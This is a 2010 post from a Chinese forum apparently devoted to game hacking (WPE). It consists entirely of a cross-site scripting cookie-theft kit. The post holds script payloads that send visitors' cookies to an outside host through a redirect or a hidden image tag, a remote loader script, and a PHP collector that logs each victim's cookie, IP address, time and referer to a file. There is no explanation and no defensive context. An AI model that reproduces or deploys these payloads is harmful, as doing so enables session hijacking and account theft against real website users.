WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2246查看
  • 0回复

主题

好友

2712

积分

禁止访问

发表于 2010-2-3 22:06:02 |显示全部楼层
javascript

<script>alert(document.cookie);</script>

<script>document.location.replace('http://www.20060801.com/xss/getcookie.php?c='+document.cookie);</script>

document.write('<img src="http://www.20060801.com/xss/getcookie.php?c='+document.cookie+'" width=0 height=0 border=0 />');

<script src=http://www.20060801.com/xss/xss.js></script>

xss.js

document.write('<img src="http://www.20060801.com/xss/getcookie.php?c='+document.cookie+'" width=0 height=0 border=0 />');

getcookie.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('victim.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$time. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-2 15:09 , Processed in 0.060639 second(s), 16 queries .

返回顶部